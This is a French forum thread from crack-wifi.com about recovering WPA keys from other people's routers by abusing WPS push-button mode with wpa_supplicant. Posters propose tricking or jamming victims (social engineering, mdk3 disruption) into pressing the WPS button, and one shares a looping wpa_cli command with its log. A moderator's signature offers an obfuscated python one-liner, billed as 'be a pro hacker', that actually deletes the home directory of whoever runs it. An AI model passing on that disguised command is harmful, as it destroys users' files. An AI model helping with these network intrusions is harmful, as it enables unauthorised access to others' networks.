Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 04-02-2015 16:16:43

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le wps et wpa_supplicant

Bien joué ! big_smile
Ce que je retire des commentaires c'est qu'il y a une méconnaissance mais aussi une méfiance. Mais à relativiser très certainement car induite par le contenu de l'article... tongue
Dans tous les cas c'est bien sympa. smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 04-02-2015 22:51:45

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Le wps et wpa_supplicant

« encore plus de chance que l'user appui sur son bouton... » .. et qu'il repasse de WPA en WEP, en mettant 0011223344 comme passe WEP wink

Oui, je pense que ça se fait nickel avec scapy, en particulier.
Il faut juste un peu de temps à lire la spec (ou dump avec wireshark pour avoir le nom des trames), la doc de scapy, et le tour est joué smile

Je ferais ça, peut-être, un de ces 4.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#28 04-02-2015 23:26:42

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

big_smile

Perso si je devais utiliser la méthode, j'irai faire un coup de social engineering pour appuyer sur le bouton moi meme tongue

Hors Ligne

#29 06-02-2015 20:07:25

goodsayan
Membre
Inscription : 02-06-2014
Messages : 15

Re : Le wps et wpa_supplicant

Bonsoir,

Fonctionne nickel!
Par contre, je  lance les commandes par ssh sur un raspberry pi avec kali. Je voudrais pouvoir fermer ma console sans que cela coupe le processus.
Petit aide pour faire ca?
Merci

Hors Ligne

#30 07-02-2015 11:38:55

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le wps et wpa_supplicant

Lorsque tu fermes la console tu arrêtes le processus qui est lancé dans cette console. C'est inévitable. Je ne sais pas exactement quel est ton problème; il faudrait que tu nous en dises un peu plus. Et le plius indiqué ce serait d'ouvrir un thème à part vu qu'il s'agit là d'un "problème" de ssh, Kali, Pie et terminal... Qui s'éloigne de la thématique de ce thème.

Hors Ligne

#31 16-02-2015 13:01:26

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Le wps et wpa_supplicant

Bien vu Koala, bravo smile

Il serait peut-être mieux d’écrire un petit script Python automatisant la tache en arrière plan comme un déamon, à part le bash il existe un script Python --> A simple unix/linux daemon in Python

Hors Ligne

#32 14-05-2015 03:04:09

Kill -9
N00b
Inscription : 14-05-2015
Messages : 3

Re : Le wps et wpa_supplicant

kcdtv a écrit :
spawn a écrit :

(si on a moyen de remonter à la PSK, ça vaut le coup de faire un truc minimal qui a juste besoin de pouvoir envoyer des paquets raw sur une interface, plutôt que de set toutes les choses que fait wpa_supplicant)

On pensait à la mème chose mais ça dépasse nos compétences et nos connaissances.

Salut à tous,
Celà commence à faire un moment que je consulte votre forum, j'ai jamais eu le courage de m'inscrire jusqu'à aujourd'hui.

J'ai trouvé des documents vraiment très intéressant techniquement sur WPS :
Présentation : http://www.wi-fi.org/download.php?file= … v2_0_1.pdf
Informations Générales : http://www.docdroid.net/109u8/wp-wi-fi- … 9.pdf.html
Spécifications Techniques :http://www.docdroid.net/109u7/ibss-with … 0.pdf.html

Bruteforcing PIN :http://web.archive.org/web/201204260818 … ck_wps.pdf

On peut notamment y trouver les processus d'authentification via WPS.

EDIT :

D'après ce que je comprends, et corrigez moi si je me trompe, en  PIN/KPAD  l'AP envoie un paquet(s) de configuration au client quand le bon PIN est entré.
N'en est-il pas de même lorsqu'on s'authentifie en PBC?
Si tel est le cas, nous devrions être en mesure de remonter à la PSK, de la même manière qu'en PIN/KPAD.

Je ne comprend pas comment, en mode PIN, le client remonte à la WPA à partir de ce paquet.
Quelle sont les informations utile (dans ce paquet) et quelles sont les opérations effectuées pour obtenir cette fameuse clé wpa ?

Si vous pouviez m'éclairer vous seriez bien aimables.

J'aurais bien aimé comparer la méthode PIN avec PBC mais j'ai pas de WPS PBC à disposition.
Si quelqu'un peut me faire une capture Wireshark de cet échange, je lui serais fort reconnaisant.


Kill -9.

Dernière modification par Kill -9 (17-05-2015 03:03:38)

Hors Ligne

#33 20-08-2015 15:42:37

Pithiviers
Membre
Lieu : Genk. Belgique.
Inscription : 01-06-2014
Messages : 10

Re : Le wps et wpa_supplicant

Voilà,ça se concrétise , je vois. J'y avais déjà pensé,mais sans avoir les connaissance pour concrétiser mon idée: http://www.crack-wifi.com/forum/topic-1 … n-wps.html

Mais,en principe, si on modifie le programme réalisant la connexion par PBC WPS sur android, on devrait pouvoir utiliser une tablette ou un smartphone pour facilement craquer un WPS.

Hors Ligne

#34 21-08-2015 12:12:18

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

Pithiviers a écrit :

Mais,en principe, si on modifie le programme réalisant la connexion par PBC WPS sur android, on devrait pouvoir utiliser une tablette ou un smartphone pour facilement craquer un WPS


A condition que la personne appuie sur le dit bouton... on en revient la quoi qu'il en soit, le social engineering et notre meilleur ami ! tongue

Hors Ligne

#35 01-09-2015 09:48:01

s1lv3rf0x
Membre Radioactif
Inscription : 02-05-2015
Messages : 71

Re : Le wps et wpa_supplicant

bonjour,


en fait avec mdk3 et cette commande y'aurai moyen de chopé toute les psk (en saturant la box cible pour obligé l'utilisateur a la reboot ) nan??

Dernière modification par s1lv3rf0x (01-09-2015 11:15:44)

Hors Ligne

#36 01-09-2015 10:55:35

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le wps et wpa_supplicant

Attends; tu mélanges un peu tout. Ce thème c'est sur le mode "Push button". Mdk3 est utilisé dans ce contexte pour que la victime appuie sur le bouton WPS parce-qu’elle n'arrive pas à se connecter/naviguer. Il n'y a pas de PIN ou de brute-force du PIN.

Hors Ligne

#37 01-09-2015 11:16:26

s1lv3rf0x
Membre Radioactif
Inscription : 02-05-2015
Messages : 71

Re : Le wps et wpa_supplicant

j'ai enlever la 2eme partie du message qui étais hors sujet en effet wink

Hors Ligne

#38 24-09-2015 21:26:23

MichelMichel
N00b
Inscription : 24-09-2015
Messages : 1

Re : Le wps et wpa_supplicant

Allez a moi ! coucou les loulous,

du coup .... effectivement faut implementer le deauth (que j'ai lu ca plus haut) si c'est faisable comme ca c'est coolos, je veux bien pythoner tout ca si on m'oriente un brin...

ma question newbie, c'est une fois connécté, cool, mais la clé on peut la recuperer pour la passer a un autre ordi par ex ?

et final for the champions, j'ai lu sur canard wifi, unarticle ou il bruteforce le WPS PIN mais je vois sur les jolies pub d'orange que maintenant c'est juste le WPS PCB ... ca a changé ? ou bien ?

cordialement, merci de m'acceuillir parmis vous dans ces magnifiques voie lactée de possibilités et de defis a relever collectivement ... aie !

pour vous, michel_michel

Hors Ligne

#39 22-02-2016 23:30:08

cyrille39100
N00b
Inscription : 22-02-2016
Messages : 1

Re : Le wps et wpa_supplicant

bonsoir
j'ai essayé l'astuce génial de M. KOALA et c'est vrai qu'elle semble génial mais à mon niveau de novice je rencontre des difficultés ...
je lance wpa_cli puis le scan ok

puis je lance dans un autre terminal:
while : ; do sudo wpa_cli wps_pbc any ; sleep 120 ; done &

et quand j'active le WPS de ma box voilà le résultat:
<3>CTRL-EVENT-SCAN-STARTED
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE-PBC
<3>SME: Trying to authenticate with 00:1a:2b:3b:64:7b (SSID='NUMERICABLE-EB8D' freq=2462 MHz)
<3>Trying to associate with 00:1a:2b:3b:64:7b (SSID='NUMERICABLE-EB8D' freq=2462 MHz)
<3>Associated with 00:1a:2b:3b:64:7b
<3>Authentication with 00:1a:2b:3b:64:7b timed out.
<3>CTRL-EVENT-DISCONNECTED bssid=00:1a:2b:3b:64:7b reason=3 locally_generated=1
<3>CTRL-EVENT-REGDOM-CHANGE init=CORE type=WORLD
<3>CTRL-EVENT-SCAN-STARTED
<3>Reject scan trigger since one is already pending

Donc à chacune de mes tentatives j'ai ce timed out ...

d'après vous que dois je faire ?

merci

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]